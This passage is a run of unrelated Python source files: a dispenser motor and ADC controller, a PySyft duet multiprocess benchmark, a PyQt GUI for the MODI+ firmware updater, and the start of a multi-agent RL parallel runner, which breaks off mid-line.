CLOCK_FLIP_TIME, "repeat": FLIPS, "right": True, "fn": self.stateFlip}, MotorState.LEFTEMPTY: { "pwm": self.anticlockwise, "duration": EMPTY_TIME, "repeat": 0, "right": False, "fn": self.stateEmpty }, MotorState.RIGHTEMPTY: { "pwm": self.clockwise, "duration": EMPTY_TIME, "repeat": 0, "right": True, "fn": self.stateEmpty }, MotorState.COMPLETE: { "pwm": 0, "duration": 0, "repeat": 0, "fn": None } } def initFeed(self, weight): self.running = True self.lastempty = self.lasttime = time.time() self.setupStates() self.sums = 0 self.counts = 0 self.total = 0 self.ms = 0 self.right = not self.right self.motor = None self.motorstate = MotorState.START self.weight = weight self.feeding = False self.error = False excess = self.excess # Limit the excess each time to half a meal either way # We should eventually catch up excess = max(min(excess, weight/2), -weight/2) self.target = self.targetFromWeight(weight - excess) if self.verbose > 0: print("Current target {0:.2f} which is {1:.2f}g total excess {2:.2f}".format(self.target, weight - excess, self.excess)) self.motorevent.clear() self.adcthread = threading.Thread(target=self.adcThread) #self.adcthread.daemon = True self.adcthread.start() self.measure = threading.Thread(target=self.measureThread) self.measure.start() time.sleep(5) self.meansquared() self.motor = threading.Thread(target=self.motorThread) #self.motor.daemon = True if self.verbose: print("Init feed done {0}".format(self.name)) def startFeed(self): self.motor.start() def join(self): self.measure.join() self.motor.join() self.adcthread.join() def stop(self): self.motorevent.set() self.lasttime = time.time() # ??? if self.verbose > 0: print("stop(): self.motorevent.set()") def meansquared(self): self.ms = self.sums / self.counts self.sums = 0 self.counts = 0 # Ensure calms cannot be 0 before divide if not self.calms: self.calms = self.ms if self.verbose: print("Mean squared {0:.2e} cal {1:.2e} ratio {2:.2e}".format(self.ms, self.calms, self.ms / self.calms)) return self.ms def measureThread(self): if self.verbose: print("measureThread {0} {1}".format(self.resetpin, self.adcchannel)) while self.running: if self.running: GPIO.output(self.resetpin, False) time.sleep(0.0005) GPIO.output(self.resetpin, True) time.sleep(0.0095 - 0.0005) self.adcevent.set() time.sleep(0.0005) # Don't check the event if the motor isn't running if self.motor != None and not self.motorevent.is_set() and self.sums >= self.target: self.motorevent.set() self.lasttime = time.time() # ??? if self.verbose > 0: print("measureThread() 1: self.motorevent.set()") if self.running: # Cope with timeout self.running = not (self.motorevent.is_set() and (time.time() - self.lasttime) > FED_TIMEOUT_SECS) if not self.running: #print("sumb {0} suma {1} sums {2} total {3} counts {4}".format(self.sumb, self.suma, self.sums, self.total, self.counts)) self.motorevent.set() self.adcevent.set() if self.verbose > 0: print("measureThread() 2: self.motorevent.set()") # Keep high to reduce current, power GPIO.output(self.resetpin, True) self.dispensed = self.weightFromTarget(self.sums) self.excess = self.dispensed - (self.weight - self.excess) self.avg = self.dispensed if self.avg == 0 else (self.avg * 0.8) + (self.dispensed * 0.2) #print("right {0} dispensed {1} excess {2} avg {3}".format(self.right, self.dispensed, self.excess, self.avg)) self.save() if self.verbose: print("measureThread ends {0}".format(self.running)) #print("sumb {0} suma {1} sums {2} total {3} counts {4}".format(self.sumb, self.suma, self.sums, self.total, self.counts)) def adcThread(self): if self.verbose: print("adcThread reset {0} adc {1}".format(self.resetpin, self.adcchannel)) while self.running: self.adcevent.wait() self.adcevent.clear() GPIO.output(DEBUG_PIN, True) a = self.adc.value a2 = a * a #if a2 > self.ms: # # Square Analogue # self.sums += a2 - self.ms # self.counts += 1 # Count all datapoints minus mean squared noise self.sums += a2 - self.ms self.counts += 1 if a > 0.5: self.lastempty = self.lasttime = time.time() self.states[MotorState.LEFT]["duration"] = ANTI_FLIP_TIME self.states[MotorState.RIGHT]["duration"] = CLOCK_FLIP_TIME self.total += 1 GPIO.output(DEBUG_PIN, False) if self.verbose: print("adcThread ends") def motorThread(self): if self.verbose: print("motorThread {0}".format(self.pwmpin)) self.feeding = True self.save() while not self.motorevent.is_set(): state = self.states[self.motorstate] state["fn"](state) state = self.states[self.motorstate] if self.verbose > 1: print("{0} {1} {2} {3}".format(self.motorstate, state["pwm"], state["duration"], self.motorstatecounter)) self.pwm.ChangeDutyCycle(state["pwm"]) self.motorevent.wait(state["duration"]) self.feeding = False # Whatever state we end in set pwm to 0 self.pwm.ChangeDutyCycle(0) def stateStart(self, state): self.motorstate = MotorState.RIGHTWIGGLE if self.right else MotorState.LEFTWIGGLE self.motorstatecounter = self.states[self.motorstate]["repeat"] def stateWiggle(self, state): if self.checkCounter(): self.motorstate = MotorState.LEFT if state["right"] else MotorState.RIGHT self.motorstatecounter = self.states[self.motorstate]["repeat"] else: self.motorstate = MotorState.LEFTWIGGLE if state["right"] else MotorState.RIGHTWIGGLE def stateFlip(self, state): if self.checkEmpty(state): return if self.checkCounter(): self.motorstate = MotorState.LEFTWIGGLE if state["right"] else MotorState.RIGHTWIGGLE self.motorstatecounter = self.states[self.motorstate]["repeat"] else: self.motorstate = MotorState.LEFT if state["right"] else MotorState.RIGHT def stateEmpty(self, state): # Guard just in case event has been set asynchronously if not self.motorevent.set(): self.lasttime = time.time() # ??? self.motorevent.set() self.empty = True self.error = True if self.verbose > 0: print("stateEmpty(): self.motorevent.set()") self.motorstate = MotorState.COMPLETE def checkCounter(self): if self.motorstatecounter > 1: self.motorstatecounter -= 1 return False else: return True def checkEmpty(self, state): dt = time.time() - self.lastempty if dt > EMPTY_TEST_SECS: self.motorstate = MotorState.LEFTEMPTY if self.motorstate == MotorState.RIGHT else MotorState.RIGHTEMPTY self.motorstatecounter = self.states[self.motorstate]["repeat"] self.lastempty = time.time() return True elif dt > HIGH_POWER_SECS: #self.states[MotorState.LEFT]["duration"] = ANTI_FLIP_MAX #self.states[MotorState.RIGHT]["duration"] = CLOCK_FLIP_MAX if int(dt / JIGGLE_INTERVAL) % 2 == 0: self.states[MotorState.LEFT]["duration"] = ANTI_FLIP_MAX self.states[MotorState.RIGHT]["duration"] = CLOCK_FLIP_TIME else: self.states[MotorState.LEFT]["duration"] = ANTI_FLIP_TIME self.states[MotorState.RIGHT]["duration"] = CLOCK_FLIP_MAX elif dt > LOW_POWER_SECS and dt <= HIGH_POWER_SECS: # Pull left for a bit, then right if int(dt / JIGGLE_INTERVAL) % 2 == 0: self.states[MotorState.LEFT]["duration"] = ((ANTI_FLIP_MAX - ANTI_FLIP_TIME) * (dt - LOW_POWER_SECS)/(HIGH_POWER_SECS - LOW_POWER_SECS)) + ANTI_FLIP_TIME self.states[MotorState.RIGHT]["duration"] = CLOCK_FLIP_TIME else: self.states[MotorState.LEFT]["duration"] = ANTI_FLIP_TIME self.states[MotorState.RIGHT]["duration"] = ((CLOCK_FLIP_MAX - CLOCK_FLIP_TIME) * (dt - LOW_POWER_SECS)/(HIGH_POWER_SECS - LOW_POWER_SECS)) + CLOCK_FLIP_TIME return False def targetFromWeight(self, weight): return (weight * self.scaletarget) / self.scaleweight def weightFromTarget(self, target): return (target * self.scaleweight) / self.scaletarget def load(self): n = self.name + ".conf" if not os.path.exists(n): return s = "" with open(n) as f: s = f.read() settings = json.loads(s) self.right = settings["right"] self.excess = settings["excess"] self.avg = settings["avg"] self.scaleweight = settings["scaleweight"] self.scaletarget = settings["scaletarget"] self.calms = settings["calms"] self.feeding = settings["feeding"] self.error = settings["error"] def save(self): settings = { "right": self.right, "excess": self.excess, "avg": self.avg, "scaleweight": self.scaleweight, "scaletarget": self.scaletarget, "calms": self.calms, "feeding": self.feeding, "error": self.error } with open(self.name + ".conf", "w") as f: f.write(json.dumps(settings)) def resetSettings(self): self.right = False self.excess = 0.0 self.avg = 0.0 self.dispensed = 0.0 self.feeding = False self.error = False def resetCalibration(self): self.scaleweight = 25.0 self.scaletarget = 3 # 10 # 30 # 6 #self.calms = 0 def calibrate(self, weight, target): self.scaleweight = weight self.scaletarget = target def info(self): print("{0} dispensed {1:.2f} average {2:.2f} excess {3:.2f} scaleweight {4:.2f} scaletarget {5:.2f} calms {6:.2e} error {7}". format(self.name, self.dispensed, self.avg, self.excess, self.scaleweight, self.scaletarget, self.calms, self.error)) def __init__(): return
benchmark_send_get_multiprocess_test.py
# stdlib import socket import time from typing import Any from typing import List # syft absolute from syft.lib.python import List as SyList from syft.lib.python.string import String # relative from ...syft.grid.duet.process_test import SyftTestProcess def do_send(data: Any, port: int) -> None: # syft absolute import syft as sy duet = sy.launch_duet(loopback=True, network_url=f"http://127.0.0.1:{port}/") duet.requests.add_handler(action="accept") _ = data.send(duet, pointable=True) sy.core.common.event_loop.loop.run_forever() def ds_get(data: Any, port: int) -> None: # syft absolute import syft as sy duet = sy.join_duet(loopback=True, network_url=f"http://127.0.0.1:{port}/") for retry in range(10): if len(duet.store) != 0: break time.sleep(0.1) assert len(duet.store) != 0 remote = duet.store[0].get(request_block=True, delete_obj=False) assert remote == data def run_endpoints(do_runner: Any, ds_runner: Any, data: Any, port: int) -> None: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: assert s.connect_ex(("localhost", port)) == 0 do_proc = SyftTestProcess(target=do_runner, args=(data, port)) do_proc.start() ds_proc = SyftTestProcess(target=ds_runner, args=(data, port)) ds_proc.start() ds_proc.join(120) do_proc.terminate() if do_proc.exception: exception, tb = do_proc.exception raise Exception(tb) from exception if ds_proc.exception: exception, tb = ds_proc.exception raise Exception(tb) from exception if ds_proc.is_alive(): ds_proc.terminate() raise Exception(f"ds_proc is hanged for {len(data)}") def send_get_string_multiprocess(data: String, port: int) -> None: run_endpoints(do_send, ds_get, String(data), port) def send_get_list_multiprocess(data: List[str], port: int) -> None: run_endpoints(do_send, ds_get, SyList(data), port)
modi2_firmware_updater.py
import io import os import pathlib import sys import threading as th import time import traceback as tb from PyQt5 import QtGui, QtWidgets, uic from PyQt5.QtCore import QObject, Qt, pyqtSignal, pyqtSlot from PyQt5.QtWidgets import QDialog, QMessageBox from modi2_firmware_updater.core.esp32_updater import ESP32FirmwareMultiUploder from modi2_firmware_updater.core.module_updater import ModuleFirmwareMultiUpdater from modi2_firmware_updater.core.network_updater import NetworkFirmwareMultiUpdater from modi2_firmware_updater.firmware_manager import FirmwareManagerForm from modi2_firmware_updater.update_list_form import ESP32UpdateListForm, ModuleUpdateListForm from modi2_firmware_updater.util.modi_winusb.modi_serialport import list_modi_serialports from modi2_firmware_updater.util.platform_util import is_raspberrypi, set_delay_option class StdoutRedirect(QObject): printOccur = pyqtSignal(str, str, name="print") def __init__(self): QObject.__init__(self, None) self.daemon = True self.sysstdout = sys.stdout.write self.sysstderr = sys.stderr.write def stop(self): sys.stdout.write = self.sysstdout sys.stderr.write = self.sysstderr def start(self): sys.stdout.write = self.write sys.stderr.write = lambda msg: self.write(msg, color="red") def write(self, s, color="black"): sys.stdout.flush() self.printOccur.emit(s, color) class PopupMessageBox(QtWidgets.QMessageBox): def __init__(self, main_window, level): QtWidgets.QMessageBox.__init__(self) self.window = main_window self.setSizeGripEnabled(True) self.setWindowTitle("System Message") def error_popup(): self.setIcon(self.Icon.Warning) self.setText("ERROR") def warning_popup(): self.setIcon(self.Icon.Information) self.setText("WARNING") self.addButton("Ok", self.ActionRole) func = { "error": error_popup, "warning": warning_popup, }.get(level) func() close_btn = self.addButton("Exit", self.ActionRole) close_btn.clicked.connect(self.close_btn) self.show() def event(self, e): MAXSIZE = 16_777_215 MINHEIGHT = 100 MINWIDTH = 200 MINWIDTH_CHANGE = 500 result = QtWidgets.QMessageBox.event(self, e) self.setMinimumHeight(MINHEIGHT) self.setMaximumHeight(MAXSIZE) self.setMinimumWidth(MINWIDTH) self.setMaximumWidth(MAXSIZE) self.setSizePolicy( QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding ) textEdit = self.findChild(QtWidgets.QTextEdit) if textEdit is not None: textEdit.setMinimumHeight(MINHEIGHT) textEdit.setMaximumHeight(MAXSIZE) textEdit.setMinimumWidth(MINWIDTH_CHANGE) textEdit.setMaximumWidth(MAXSIZE) textEdit.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding,) return result def close_btn(self): self.window.close() class ThreadSignal(QObject): thread_error = pyqtSignal(object) thread_signal = pyqtSignal(object) def __init__(self): super().__init__() class Form(QDialog): """ GUI Form of MODI+ Firmware Updater """ def __init__(self, debug=False, multi=True): QDialog.__init__(self) self.__excepthook = sys.excepthook sys.excepthook = self.__popup_excepthook th.excepthook = self.__popup_thread_excepthook self.err_list = list() self.is_popup = False self.is_debug = debug self.is_multi = multi ui_path = os.path.join(os.path.dirname(__file__), "assets", "main.ui") firmware_manager_ui_path = os.path.join(os.path.dirname(__file__), "assets", "firmware_manager.ui") esp32_update_list_ui_path = os.path.join(os.path.dirname(__file__), "assets", "esp32_update_list.ui") module_update_list_ui_path = os.path.join(os.path.dirname(__file__), "assets", "module_update_list.ui") if sys.platform.startswith("win"): self.component_path = pathlib.PurePosixPath(pathlib.PurePath(__file__), "..", "assets", "component") else: self.component_path = os.path.join(os.path.dirname(__file__), "assets", "component") self.ui = uic.loadUi(ui_path) self.assets_firmware_path = os.path.join(os.path.dirname(__file__), "assets", "firmware") self.local_firmware_path = os.path.join(os.path.expanduser("~"), "Documents", "modi+ firmware updater") self.module_firmware_directory = "module_firmware" self.module_firmware_path = os.path.join(self.local_firmware_path, self.module_firmware_directory) self.ui.setStyleSheet("background-color: white") # Set LUXROBO logo image logo_path = os.path.join(self.component_path, "luxrobo_logo.png") qPixmapVar = QtGui.QPixmap() qPixmapVar.load(logo_path) self.ui.lux_logo.setPixmap(qPixmapVar) self.firmware_manage_form = FirmwareManagerForm(path_dict={ "ui": firmware_manager_ui_path, "component": self.component_path, "assets_firmware": self.assets_firmware_path, "local_firmware": self.local_firmware_path, "firmware_directory": self.module_firmware_directory }) self.esp32_update_list_form = ESP32UpdateListForm(path_dict={ "ui": esp32_update_list_ui_path, "component": self.component_path, }) self.module_update_list_form = ModuleUpdateListForm(path_dict={ "ui": module_update_list_ui_path, "component": self.component_path, }) # Buttons image self.active_path = pathlib.PurePosixPath(self.component_path, "btn_frame_active.png") self.inactive_path = pathlib.PurePosixPath(self.component_path, "btn_frame_inactive.png") self.pressed_path = pathlib.PurePosixPath(self.component_path, "btn_frame_pressed.png") self.language_frame_path = pathlib.PurePosixPath(self.component_path, "lang_frame.png") self.language_frame_pressed_path = pathlib.PurePosixPath(self.component_path, "lang_frame_pressed.png") self.ui.update_network_module_button.setStyleSheet(f"border-image: url({self.active_path}); color: black;") self.ui.update_network_submodule_button.setStyleSheet(f"border-image: url({self.active_path}); color: black;") self.ui.delete_user_code_button.setStyleSheet(f"border-image: url({self.active_path}); color: black;") self.ui.update_general_modules_button.setStyleSheet(f"border-image: url({self.active_path}); color: black;") self.ui.manage_firmware_version_button.setStyleSheet(f"border-image: url({self.active_path}); color: black;") self.ui.translate_button.setStyleSheet(f"border-image: url({self.language_frame_path}); color: black;") self.ui.devmode_button.setStyleSheet(f"border-image: url({self.language_frame_path}); color: black;") self.ui.console.setStyleSheet(f"font-size: 10px; color: black") version_path = os.path.join(os.path.dirname(__file__), "..", "version.txt") with io.open(version_path, "r") as version_file: self.version_info = version_file.readline().rstrip("\n") if self.is_multi: self.ui.setWindowTitle("MODI+ Firmware Multi Updater - " + self.version_info) else: self.ui.setWindowTitle("MODI+ Firmware Updater - " + self.version_info) self.ui.setWindowIcon(QtGui.QIcon(os.path.join(self.component_path, "network_module.ico"))) self.ui.setWindowFlag(Qt.WindowMinimizeButtonHint, True) self.ui.setWindowFlag(Qt.WindowMaximizeButtonHint, True) # Redirect stdout to text browser (i.e. console in our UI) if not self.is_debug: self.stdout = StdoutRedirect() self.stdout.start() self.stdout.printOccur.connect(lambda line: self.__append_text_line(line)) # Set signal for thread communication self.stream = ThreadSignal() # Connect up the buttons self.ui.update_network_module_button.clicked.connect(self.update_network_module_button_clicked) self.ui.update_network_submodule_button.clicked.connect(self.update_network_submodule_button_clicked) self.ui.delete_user_code_button.clicked.connect(self.delete_user_code_button_clicked) self.ui.update_general_modules_button.clicked.connect(self.update_general_modules_button_clicked) self.ui.manage_firmware_version_button.clicked.connect(self.manage_firmware_version_button_clicked) self.ui.devmode_button.clicked.connect(self.devmode_button_clicked) self.ui.translate_button.clicked.connect(self.translate_button_clicked) self.buttons = [ self.ui.update_network_module_button, self.ui.update_network_submodule_button, self.ui.delete_user_code_button, self.ui.update_general_modules_button, self.ui.manage_firmware_version_button, self.ui.devmode_button, self.ui.translate_button, ] self.button_en = [ "Update Network Module", "Update Network Submodule", "Delete User Code", "Update General Modules", "Manage Module Firmware Version", "Show Detail", "한국어", ] self.button_kr = [ "네트워크 모듈 업데이트", "네트워크 서브 모듈 업데이트", "시용자 코드 삭제", "일반 모듈 업데이트", "펌웨어 관리", "자세히 보기", "English", ] # Disable the first button to be focused when UI is loaded self.ui.update_network_module_button.setAutoDefault(False) self.ui.update_network_module_button.setDefault(False) # Set up field variables self.firmware_updater = None self.button_in_english = False self.console = False # Set up ui field variables self.ui.is_english = False self.ui.active_path = self.active_path self.ui.pressed_path = self.pressed_path self.ui.language_frame_path = self.language_frame_path self.ui.language_frame_pressed_path = self.language_frame_pressed_path self.ui.stream = self.stream # check module firmware self.check_module_firmware() # Set Button Status self.refresh_button_text() self.refresh_console() # Set delay option delay_option = (self.is_multi==True) set_delay_option(delay_option) # check app update self.check_app_update() if is_raspberrypi(): self.ui.setMinimumSize(0, 0) self.ui.setWindowState(Qt.WindowMaximized) self.ui.show() # # Main methods # def update_network_module_button_clicked(self): button_start = time.time() if self.firmware_updater and self.firmware_updater.update_in_progress: if self.is_multi: self.module_update_list_form.ui.show() return self.ui.update_network_module_button.setStyleSheet(f"border-image: url({self.pressed_path}); color: black;") self.ui.console.clear() print("Network Firmware Updater has been initialized for base update!") th.Thread( target=self.__click_motion, args=(0, button_start), daemon=True ).start() modi_ports = list_modi_serialports() if not modi_ports: raise Exception("No MODI+ port is connected") if self.is_multi: self.module_update_list_form.ui.setWindowTitle("Update Network Modules") self.module_update_list_form.reset_device_list() firmware_version_info = self.firmware_manage_form.get_config_firmware_version_info() def run_task(self, modi_ports, firmware_version_info): self.firmware_updater = NetworkFirmwareMultiUpdater(self.module_firmware_path) self.firmware_updater.set_task_end_callback(self.__reset_ui) if self.is_multi: self.firmware_updater.set_ui(self.ui, self.module_update_list_form) self.firmware_updater.update_module_firmware(modi_ports, firmware_version_info) else: self.firmware_updater.set_ui(self.ui, None) self.firmware_updater.update_module_firmware([modi_ports[0]], firmware_version_info) th.Thread( target=run_task, args=(self, modi_ports, firmware_version_info), daemon=True ).start() if self.is_multi: if is_raspberrypi(): self.module_update_list_form.ui.setWindowState(Qt.WindowMaximized) self.module_update_list_form.ui.exec_() def update_network_submodule_button_clicked(self): button_start = time.time() if self.firmware_updater and self.firmware_updater.update_in_progress: if self.is_multi: self.esp32_update_list_form.ui.show() return self.ui.update_network_submodule_button.setStyleSheet(f"border-image: url({self.pressed_path}); color: black;") self.ui.console.clear() print("ESP32 Firmware Updater has been initialized for esp update!") th.Thread( target=self.__click_motion, args=(1, button_start), daemon=True ).start() modi_ports = list_modi_serialports() if not modi_ports: raise Exception("No MODI+ port is connected") if self.is_multi: self.esp32_update_list_form.ui.setWindowTitle("Update Network Submodules") self.esp32_update_list_form.reset_device_list() firmware_version_info = self.firmware_manage_form.get_config_firmware_version_info() def run_task(self, modi_ports, firmware_version_info): self.firmware_updater = ESP32FirmwareMultiUploder(self.module_firmware_path) self.firmware_updater.set_task_end_callback(self.__reset_ui) if self.is_multi: self.firmware_updater.set_ui(self.ui, self.esp32_update_list_form) self.firmware_updater.update_firmware(modi_ports, False, firmware_version_info) else: self.firmware_updater.set_ui(self.ui, None) self.firmware_updater.update_firmware([modi_ports[0]], False, firmware_version_info) th.Thread( target=run_task, args=(self, modi_ports, firmware_version_info), daemon=True ).start() if self.is_multi: if is_raspberrypi(): self.esp32_update_list_form.ui.setWindowState(Qt.WindowMaximized) self.esp32_update_list_form.ui.exec_() def delete_user_code_button_clicked(self): button_start = time.time() if self.firmware_updater and self.firmware_updater.update_in_progress: if self.is_multi: self.esp32_update_list_form.ui.show() return self.ui.delete_user_code_button.setStyleSheet(f"border-image: url({self.pressed_path}); color: black;") self.ui.console.clear() print("ESP32 Firmware Updater has been initialized for esp interpreter update!") th.Thread( target=self.__click_motion, args=(2, button_start), daemon=True ).start() modi_ports = list_modi_serialports() if not modi_ports: raise Exception("No MODI+ port is connected") if self.is_multi: self.esp32_update_list_form.ui.setWindowTitle("Delete User Code") self.esp32_update_list_form.reset_device_list() firmware_version_info = self.firmware_manage_form.get_config_firmware_version_info() def run_task(self, modi_ports, firmware_version_info): self.firmware_updater = ESP32FirmwareMultiUploder(self.module_firmware_path) self.firmware_updater.set_task_end_callback(self.__reset_ui) if self.is_multi: self.firmware_updater.set_ui(self.ui, self.esp32_update_list_form) self.firmware_updater.update_firmware(modi_ports, True, firmware_version_info) else: self.firmware_updater.set_ui(self.ui, None) self.firmware_updater.update_firmware([modi_ports[0]], True, firmware_version_info) th.Thread( target=run_task, args=(self, modi_ports, firmware_version_info), daemon=True ).start() if self.is_multi: if is_raspberrypi(): self.esp32_update_list_form.ui.setWindowState(Qt.WindowMaximized) self.esp32_update_list_form.ui.exec_() def update_general_modules_button_clicked(self): button_start = time.time() if self.firmware_updater and self.firmware_updater.update_in_progress: if self.is_multi: self.module_update_list_form.ui.show() return self.ui.update_general_modules_button.setStyleSheet(f"border-image: url({self.pressed_path}); color: black;") self.ui.console.clear() print("Module Firmware Updater has been initialized for module update!") th.Thread( target=self.__click_motion, args=(3, button_start), daemon=True ).start() modi_ports = list_modi_serialports() if not modi_ports: self.__reset_ui(self.module_update_list_form) raise Exception("No MODI+ port is connected") if self.is_multi: self.module_update_list_form.ui.setWindowTitle("Update General Modules") self.module_update_list_form.reset_device_list() firmware_version_info = self.firmware_manage_form.get_config_firmware_version_info() def run_task(self, modi_ports, firmware_version_info): self.firmware_updater = ModuleFirmwareMultiUpdater(self.module_firmware_path) self.firmware_updater.set_task_end_callback(self.__reset_ui) if self.is_multi: self.firmware_updater.set_ui(self.ui, self.module_update_list_form) self.firmware_updater.update_module_firmware(modi_ports, firmware_version_info) else: self.firmware_updater.set_ui(self.ui, None) self.firmware_updater.update_module_firmware([modi_ports[0]], firmware_version_info) th.Thread( target=run_task, args=(self, modi_ports, firmware_version_info), daemon=True ).start() if self.is_multi: if is_raspberrypi(): self.module_update_list_form.ui.setWindowState(Qt.WindowMaximized) self.module_update_list_form.ui.exec_() def manage_firmware_version_button_clicked(self): button_start = time.time() self.ui.manage_firmware_version_button.setStyleSheet(f"border-image: url({self.pressed_path}); color: black;") self.ui.console.clear() th.Thread( target=self.__click_motion, args=(4, button_start), daemon=True ).start() self.firmware_manage_form.refresh_firmware_info() self.firmware_manage_form.ui.exec_() self.__reset_ui() def devmode_button_clicked(self): button_start = time.time() self.ui.devmode_button.setStyleSheet(f"border-image: url({self.language_frame_pressed_path}); font-size: 13px; color: black;") th.Thread( target=self.__click_motion, args=(5, button_start), daemon=True ).start() self.console = not self.console self.refresh_console() def translate_button_clicked(self): button_start = time.time() self.ui.translate_button.setStyleSheet(f"border-image: url({self.language_frame_pressed_path}); font-size: 13px; color: black;") th.Thread( target=self.__click_motion, args=(6, button_start), daemon=True ).start() self.button_in_english = not self.button_in_english self.ui.is_english = not self.ui.is_english self.refresh_button_text() def refresh_console(self): if is_raspberrypi(): self.ui.console.hide() self.ui.manage_firmware_version_button.setVisible(False) self.ui.setWindowState(Qt.WindowMaximized) else: if self.console: self.ui.console.show() self.ui.manage_firmware_version_button.setVisible(True) else: self.ui.console.hide() self.ui.manage_firmware_version_button.setVisible(False) self.ui.adjustSize() def refresh_button_text(self): appropriate_translation = (self.button_en if self.button_in_english else self.button_kr) for i, button in enumerate(self.buttons): button.setText(appropriate_translation[i]) def check_module_firmware(self): check_success = True firmware_list = self.firmware_manage_form.check_firmware() if len(firmware_list) == 0: download_success = self.firmware_manage_form.download_firmware() if download_success: refresh_success = self.firmware_manage_form.refresh_firmware_info() if refresh_success: self.firmware_manage_form.apply_firmware(show_message=False) else: check_success = False else: check_success = False else: refresh_success = self.firmware_manage_form.refresh_firmware_info() self.firmware_manage_form.apply_firmware(show_message=False) if not check_success: raise Exception("download firmware first,\n and select firmware version") else: self.firmware_manage_form.check_firmware_version_update() def check_app_update(self): try: import requests response = requests.get("https://api.github.com/repos/LUXROBO/modi2-firmware-updater/releases/latest").json() current_version = self.version_info latest_version = response["name"] import platform download_url = response["html_url"] for asset in response["assets"]: file_name = asset["name"] if not "Multi" in file_name and not "multi" in file_name: # single updater if platform.system() == "Darwin" and ".dmg" in file_name: download_url = asset["browser_download_url"] elif platform.system() == "Windows" and ".exe" in file_name: download_url = asset["browser_download_url"] from packaging import version if version.parse(latest_version) > version.parse(current_version): print(f"need to update to {latest_version}\n{download_url}") msg = QMessageBox() msg.setWindowIcon(QtGui.QIcon(os.path.join(self.component_path, "network_module.ico"))) msg.setWindowTitle("App update") msg.setStandardButtons(QMessageBox.Ok) msg.setIcon(QMessageBox.Icon.Information) msg.setText(f"need to update to {latest_version}") msg.setDetailedText(download_url) msg.exec_() import webbrowser webbrowser.open(download_url, new=0, autoraise=True) except: pass # # Helper functions # def __popup_excepthook(self, exctype, value, traceback): self.__excepthook(exctype, value, traceback) if self.is_popup: return self.popup = PopupMessageBox(self.ui, level="error") self.popup.setInformativeText(str(value)) self.popup.setDetailedText(str(tb.extract_tb(traceback))) self.is_popup = True def __popup_thread_excepthook(self, err_msg): if err_msg.exc_type in self.err_list: return self.err_list.append(err_msg.exc_type) self.stream.thread_error.connect(self.__thread_error_hook) self.stream.thread_error.emit(err_msg) @pyqtSlot(object) def __thread_error_hook(self, err_msg): self.__popup_excepthook(err_msg.exc_type, err_msg.exc_value, err_msg.exc_traceback) def __click_motion(self, button_type, start_time): # Busy wait for 0.2 seconds while time.time() - start_time < 0.2: pass if button_type in [5, 6]: self.buttons[button_type].setStyleSheet(f"border-image: url({self.language_frame_path}); font-size: 13px; color: black;") else: self.buttons[button_type].setStyleSheet(f"border-image: url({self.active_path}); color: black;") for i, q_button in enumerate(self.buttons): if i in [button_type, 5, 6]: continue q_button.setStyleSheet(f"border-image: url({self.inactive_path}); color: black;") q_button.setEnabled(False) def __reset_ui(self, list_ui = None): for i, q_button in enumerate(self.buttons): if i in [5, 6]: continue q_button.setStyleSheet(f"border-image: url({self.active_path}); color: black;") q_button.setEnabled(True) # refresh language self.refresh_button_text() # reset list ui if list_ui == self.module_update_list_form: self.module_update_list_form.ui.close_button.setEnabled(True) self.module_update_list_form.total_status_signal.emit("Complete") self.module_update_list_form.total_progress_signal.emit(100) elif list_ui == self.esp32_update_list_form: self.esp32_update_list_form.ui.close_button.setEnabled(True) self.esp32_update_list_form.total_status_signal.emit("Complete") def __append_text_line(self, line): self.ui.console.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor) self.ui.console.moveCursor(QtGui.QTextCursor.StartOfLine, QtGui.QTextCursor.MoveAnchor) self.ui.console.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.KeepAnchor) # Remove new line character if current line represents update_progress if self.__is_update_progress_line(line): self.ui.console.textCursor().removeSelectedText() self.ui.console.textCursor().deletePreviousChar() # Display user text input self.ui.console.moveCursor(QtGui.QTextCursor.End) self.ui.console.insertPlainText(line) @staticmethod def __is_update_progress_line(line): return line.startswith("\r")
parallel_runner.py
from envs import REGISTRY as env_REGISTRY from functools import partial from components.episode_buffer import EpisodeBatch from multiprocessing import Pipe, Process import numpy as np import torch as th # Based (very) heavily on SubprocVecEnv from OpenAI Baselines # https://github.com/openai/baselines/blob/master/baselines/common/vec_env/subproc_vec_env.py class ParallelRunner: def __init__(self, args, logger): self.args = args self.logger = logger self.batch_size = self.args.batch_size_run # Make subprocesses for the envs self.parent_conns, self.worker_conns = zip(*[Pipe() for _ in range(self.batch_size)]) env_fn = env_REGISTRY[self.args.env] env_args = [self.args.env_args.copy() for _ in range(self.batch_size)] for i in range(self.batch_size): env_args[i]["seed"] += i self.ps = [Process(target=env_worker, args=(worker_conn, CloudpickleWrapper(partial(env_fn, **env_arg)))) for env_arg, worker_conn in zip(env_args, self.worker_conns)] for p in self.ps: p.daemon = True p.start() self.parent_conns[0].send(("get_env_info", None)) self.env_info = self.parent_conns[0].recv() self.episode_limit = self.env_info["episode_limit"] self.t = 0 self.t_env = 0 self.train_returns = [] self.test_returns = [] self.train_stats = {} self.test_stats = {} self.log_train_stats_t = -100000 def setup(self, scheme, groups, preprocess, mac): self.new_batch = partial(EpisodeBatch, scheme, groups, self.batch_size, self.episode_limit + 1, preprocess=preprocess, device=self.args.device) self.mac = mac self.scheme = scheme self.groups = groups self.preprocess = preprocess def get_env_info(self): return self.env_info def save_replay(self): pass def close_env(self): for parent_conn in self.parent_conns: parent_conn.send(("close", None)) def reset(self): self.batch = self.new_batch() # Reset the envs for parent_conn in self.parent_conns: parent_conn.send(("reset", None)) pre_transition_data = { "state": [], "avail_actions": [], "obs": [] } # Get the obs, state and avail_actions back for parent_conn in self.parent_conns: data = parent_conn.recv() pre_transition_data["state"].append(data["state"]) pre_transition_data["avail_actions"].append(data["avail_actions"]) pre_transition_data["obs"].append(data["obs"]) self.batch.update(pre_transition_data, ts=0) self.t = 0 self.env_steps_this_run = 0 def run(self, test_mode=False): self.reset() all_terminated = False episode_returns = [0 for _ in range(self.batch_size)] episode_lengths = [0 for _ in range(self.batch_size)] self.mac.init_hidden(batch_size=self.batch_size) terminated = [False for _ in range(self.batch_size)] envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed] final_env_infos = [] # may store extra stats like battle won. this is filled in ORDER OF TERMINATION while True: # Pass the entire batch of experiences up till now to the agents # Receive the actions for each agent at this timestep in a batch for each un-terminated env actions = 